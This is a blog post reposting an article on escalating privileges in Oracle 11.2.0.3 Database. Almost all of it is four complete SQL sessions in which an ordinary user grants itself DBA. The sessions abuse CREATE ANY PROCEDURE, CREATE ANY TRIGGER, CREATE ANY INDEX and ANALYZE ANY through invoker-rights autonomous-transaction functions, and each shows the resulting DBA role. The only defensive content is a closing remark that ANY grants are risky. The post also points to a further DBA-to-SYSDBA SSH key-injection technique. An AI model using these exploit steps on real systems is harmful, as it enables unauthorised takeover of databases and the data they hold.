"In this article I will show some basic technics of escalating privileges in Oracle 11.2.0.3 Database. My goal in each case is to gain DBA privilege from *ANY* privileges."
--~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-- CASE 1 - EXECUTE ANY and CREATE ANY PROCEDURE
--~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
HR@ORCL> select privilege from user_sys_privs union all
select granted_role from user_role_privs;
-- PRIVILEGE
-- ----------------------------------------
-- CREATE SESSION
-- CREATE ANY PROCEDURE
-- EXECUTE ANY PROCEDURE
-- RESOURCE
HR@ORCL> create or replace procedure system.get_dba as
begin
execute immediate 'grant dba to hr';
end get_dba;
/
HR@ORCL> exec system.get_dba;
HR@ORCL> select granted_role from user_role_privs;
-- GRANTED_ROLE
-- ------------------------------
-- DBA
-- RESOURCE
--~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-- CASE 2 - CREATE ANY TRIGGER
--~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
HR@ORCL> select privilege from user_sys_privs union all
select granted_role from user_role_privs;
-- PRIVILEGE
-- ----------------------------------------
-- CREATE SESSION
-- CREATE ANY TRIGGER
-- RESOURCE
HR@ORCL> create or replace procedure get_dba authid current_user is
pragma autonomous_transaction;
begin
execute immediate 'grant dba to hr';
end get_dba;
/
HR@ORCL> select t.table_name, p.privilege
from all_tab_privs p, all_tables t
where p.table_name = t.table_name
and t.owner = 'SYSTEM'
and p.grantee = 'PUBLIC'
and p.privilege = 'INSERT'
order by t.table_name;
-- TABLE_NAME PRIVILEGE
-- ------------------------------ ----------------------------------------
-- OL$ INSERT
-- OL$HINTS INSERT
-- OL$NODES INSERT
HR@ORCL> grant execute on get_dba to system;
HR@ORCL> create or replace trigger system.ol$insert_trg
before insert on system.ol$ for each row
begin
hr.get_dba;
end ol$insert_trg;
/
HR@ORCL> insert into system.ol$(CATEGORY) values ('');
HR@ORCL> select granted_role from user_role_privs;
-- GRANTED_ROLE
-- ------------------------------
-- DBA
-- RESOURCE
--~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-- CASE 3 - CREATE ANY INDEX
--~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
HR@ORCL> select privilege from user_sys_privs union all
select granted_role from user_role_privs;
-- PRIVILEGE
-- ----------------------------------------
-- CREATE SESSION
-- CREATE ANY INDEX
-- RESOURCE
HR@ORCL> create or replace function get_dba(p_col_name varchar2)
return varchar2 deterministic authid current_user
is
pragma autonomous_transaction;
begin
execute immediate 'grant dba to hr';
return upper(p_col_name);
end get_dba;
/
HR@ORCL> grant execute on get_dba to system;
HR@ORCL> create index system.ol$get_dba_ix on system.ol$(hr.get_dba(VERSION));
HR@ORCL> insert into system.ol$(version) values ('');
HR@ORCL> select granted_role from user_role_privs;
-- GRANTED_ROLE
-- ------------------------------
-- DBA
-- RESOURCE
--~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-- CASE 4 - ANALYZE ANY
--~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
HR@ORCL> select privilege from user_sys_privs union all
select granted_role from user_role_privs;
-- PRIVILEGE
-- ----------------------------------------
-- CREATE SESSION
-- ANALYZE ANY
-- RESOURCE
HR@ORCL> select t.table_name
from all_tab_privs p, all_tables t
where p.table_name = t.table_name
and t.owner = 'SYSTEM'
and p.grantee = 'PUBLIC'
and t.temporary = 'N'
order by t.table_name;
-- TABLE_NAME
-- ------------------------------
-- HELP
HR@ORCL> create or replace function get_dba(p_col varchar2)
return varchar2 deterministic authid current_user
is
pragma autonomous_transaction;
begin
execute immediate 'grant dba to hr';
return upper(p_col);
end get_dba;
/
HR@ORCL> grant execute on get_dba to system;
HR@ORCL> begin
dbms_stats.gather_table_stats(
ownname => 'SYSTEM',
tabname => 'HELP',
method_opt => 'for columns (hr.get_dba(INFO)) size auto');
end;
/
HR@ORCL> select granted_role from user_role_privs;
-- GRANTED_ROLE
-- ------------------------------
-- DBA
-- RESOURCE
We already knew that the "ANY" grants could cause security problems, and this article is a good reminder to use these types of grants carefully. At the end of this article there is also an interesting case on "How to escalate from DBA to SYSDBA" which gives access to the database server itself through SSH without password (RSA keys injection). Hit the link for more info.
From:
http://ora-600.pl/art/oracle_privilege_escalation.pdf (Kamil Stawiarski)
No comments:
Post a Comment